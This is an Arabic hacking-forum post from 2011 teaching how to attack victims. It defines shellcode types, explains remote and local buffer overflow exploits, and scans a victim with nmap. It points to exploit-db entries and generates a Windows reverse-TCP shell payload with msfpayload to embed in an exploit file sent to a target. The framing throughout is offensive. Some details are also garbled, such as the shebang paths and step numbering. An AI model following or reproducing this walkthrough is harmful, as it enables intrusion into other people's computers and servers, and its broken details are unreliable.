عرض مشاركة واحدة
قديم 02-26-2011, 09:13 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Cyber Cool
:: Expert Hacker ::
 
الصورة الرمزية Cyber Cool
 

 

 
إحصائية العضو






Cyber Cool غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 13
Cyber Cool is on a distinguished road

افتراضي تعريف shellcode + انشاء شل خاص فيك + واختراق البرامج المركبة






كيفكم اخواني انشاء الله اموركم طيبة ونصركم الله على مافيه خير .؟!

باذن الله لو تقرا الموضوع كامل وتفهمة راح تفهك shellcode وكل شي عنه

وايضا معرفة البحث عن البرامج المركبة وانواع ثغراتها وكتابة shellcode

خاص فيك , والشرح على windows و backtrack4

اليوم معنا موضوع انشاء الله الجميع يستفيد منة :



1- تعريف shellcode ؟

2- فحص server او ip بــ Nmap ومعرفة البرامج المركبة عند الضحية + كيفة البحث عن ثغرات البرامج

4- ثغرات Remote Buffer OverFlow

5- ثغرات Local Buffer OverFlow

6- كتابة shellcode خاص فينا ؟




في البادية يجي للذهن ماهو shellcode ؟

هو عبارة عن رموز تستطيع خلق اتصال بينك وبين الضحية وتعطيك الصلاحية بالتحكم

بالضحية ويتخلف من بيئة لاخرى ( يعني بيئة اللينكس والوندوز ... الـخ ) والشرح راح يكون على النظامينqalpp

ايضا يعرف بكود برمجي صغير يستخدم كبايلود في الثغرات البرمجيه

طيب كيف تعرفة لمن تفتح الثغرة بكل بساطة في كلمات داله علية بالثغرة

مثل :

shellcode ,my $s h e l lc o d e
زي كذا





طيب ياترى ماهي انواع shellcode

1- local shellcode

عبارة shellcode محلي يستخدم من قبل المهاجم وتكون صلاحيتة محدودة

ولكن (يحول صلاحيتة بثغرات البرامج لصلاحية روت انت تم التشغيل بشكل صحيح )


-remote shellcode

يستخدم من قبل المهاجم حيث يستغل اي نقطة ضعف في الـ process التي تكون الضحية

او اي جهاز معن في الشبكة خارجها في الانترنت

اذا نجح الاتصال بهذا shellcode في العادة يستخدم TCP/IP socket

طيب الي متعود يعمل shellcode خلال المشروع للميتاسبلويت تلاقي مثلا bindshell

ويش معنات هذا هذي لو انت تبي تسوي اتصال بينك وبين الضحية ياحلـو

وهنا تكمن التسمية bind اي خلال البورت



3- Download and execute shellcode

معروف ومشهور والاغلب يسمع فيه يجيك واحد يقول حصري على منتدنا اختراق

اختراق بالميتاسبلويت وارفع باتش بيفروست !

يعني المقصود حبايبي يعني تحميل وتشغيل shellcode هذا بابسط صورة

4- Staged

هذا يقول لك لمن يسوي install يعني يسوي لود للبانات فتوصل لاقصى حد لها

هنا بالامكان حقن الـ porocess , ومن ثم الاستغلال لصالحك

5- Egg-hunt shellcode

وهذا يبحث عن عنوان العمليات وله مساحة وحجم اقل من shellcode

6-Omelet shellcode

يستخدم لحقن عنوان صغير جدا داخل احد العمليات process




ثغرات Remote Buffer OverFlow :


الاختراق عن طريق احد البرامج المصابة المركبة عند الضحية او في سيرفر معين ,

ويتم الاختراق عن طريق ip مباشرة انما هنالك شروط لهذه الثغرة

وهنا تكمن خطورة الثغرة لذلك لابد من توفر شروط



1- توفر وجود البرنامج عند الضحية او السيرفر وتوافق الاصدار او لاترقع الثغرة

2- عمل shellcode المناسب

3- بعضها تحتاج لمفسر الباثيون , البيرل , الروبي لابد من توفرها .



على سبيل المثـال :

كود PHP:
http://www.exploit-db.com/exploits/16101/ 



طريقة الاستخدام بالشكل التـالي :







ثغرات Local Buffer OverFlow :

ثغرات ومن الاسم تعرف انها محلية يعني , تخترق بصيغة البرنامج المصاب مثل لو عندي

ثغرة لبرنامج الريل بلاير ؟ اترجم الثغرة واجهز شيل كود صحيح تنشى لي ملف

بنفس صيغة البرنامج المصاب كل الي عليك ترسلة للضحيـة


على سبيل المثـال :


كود PHP:
 http://www.exploit-db.com/exploits/16072/ 




طريقة الاستخدام بالشكل التـالي :




طيب بعد الانتهاء من انشاء shellcode وهذا ماسوف نتطرق اليه في اخر خطوة بالامكان التنصت

بالميتاسبلويت بعد ارسال الملف او النت كات كما يوضح امامكم




تنوية مهـم جـدا :

الثغرات زي متلاحظون مكتوبة بالبيرل , الروبي الباثيون , السي طيب بالنسبة لمستخدمي الوندوز

وللمعلومية جميعها للغات برمجية



راح اعطيهم الراوبط للمفسرات في نهاية الموضوع وكيف تعرف انها باي لغة مكتوبة زي ماشرحنا على

الصور وراح نكرر العملــية عشان الموضوع مفهوم من مجاميعة


كود PHP:
#!/user/bin/ruby     للغة الروبي 
كود PHP:
 #!/user/bin/python      للغة الباثيون 
كود PHP:
 #!/user/bin/perl  للغة البيرل 
كود PHP:
 #!/user/bin/php  للغة البي اتش بي 
كود PHP:
 #include<iostream.h>   هذه للغة السي ++ 
طيب بالنسبة للـينكس مثلا الـ Backtrack 4

ماتجتاج زي ماهو موضح امامكم


افتح مستند وانسخ الثغرة :











فحص server او ip بــ Nmap ومعرفة البرامج المركبة عند الضحية + كيفة البحث عن ثغرات البرامج :


احنا راح نتطرق للفحص بـ Nmap فقط ولكن تقدر تفحص بالميتاسبلويت وnikto2

او اي اداة موجود في Backtrack 4 مليان ادوات فحص

الـ Nmap :

اداة معروفة ومشهورة وجدي يعرفها للفحص السيرفر والايبي ادرس والشبكات

ومعرفة البرامج المركبة وخدماتها والمنافذ (البورتات المفتوحة ) وهي موجودة في

Backtack 4 وملستخدمي الوندوز هذا الرابط الرسمـي للموقع


كود PHP:
 nmap.org
[php] nmap -sV IP victim or server الضحية او السيرفر المراد فحصة [php]



الان كيف تبحث عن ثغرات البرامج :

في البداية نذهب لهـذا الموقع


كود PHP:
 http://www.exploit-db.com 








الان انشـاء shellcode خاص فينا ؟ بالمناسبة هنا تصير مشاكل كثير :


يعني واحد مايدري انواع shellcode واي واحد مناسب له ؟ مع انه الثغرة هي

التي تقيدك بـ shellcode المناسب على سبيل المثال هذه الثغرة :


كود PHP:
 http://www.exploit-db.com/exploits/5563/ 



طيب زي ماهو موضح عندك محدد نوع shellcode في الثغرة والي لازم انك تعمل لك

واحد خاص فيك ؟ وانت تروح تفرفر وتتفلسف وتقول اسوي shellcode metepreter

كود PHP:
my $shellcode =
# windows/shell_bind_tcp - 500 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444 
طيب مثلا انا لو اريد اعمل shellcode

كود PHP:
 windows/shell/reverse_tcp 
طيب اولا التطبيق على windows وبعدها على backtrack 4








وانتهى ولان ننسخة في الثغرة تبعنا


طيب بالنسبة للـ Backtrack4


كود PHP:
 cd /opt/metasploit3/msf3
كود PHP:
msfpayload windows/shell/reverse_tcp LHOSTIP LPORT PORT 




الحمد لله انتهى والان نعطيكم برامج مترجمات الثغرات على الوندوز من المواقع الرسمية :


كود PHP:
Active Perl
http
://www.activestate.com/activeperl/downloads
ActivePython
http
://www.activestate.com/activepython/downloads
C++
http://www.cygwin.com/setup
Ruby
http
://rubyforge.org/frs/download.ph...186-27_rc2
PhP
http
://sourceforge.net/projects/appserv/ 
اذا الموضوع يستاهل نريد تقيمكم والي الموضوع مايعجبة يرد عادي ويقول راية

اتمنى ان الموضوع واضح وبسيط يالله اشوفكم على خير ســلام








juvdt shellcode + hkahx ag ohw td; ,hojvhr

   

رد مع اقتباس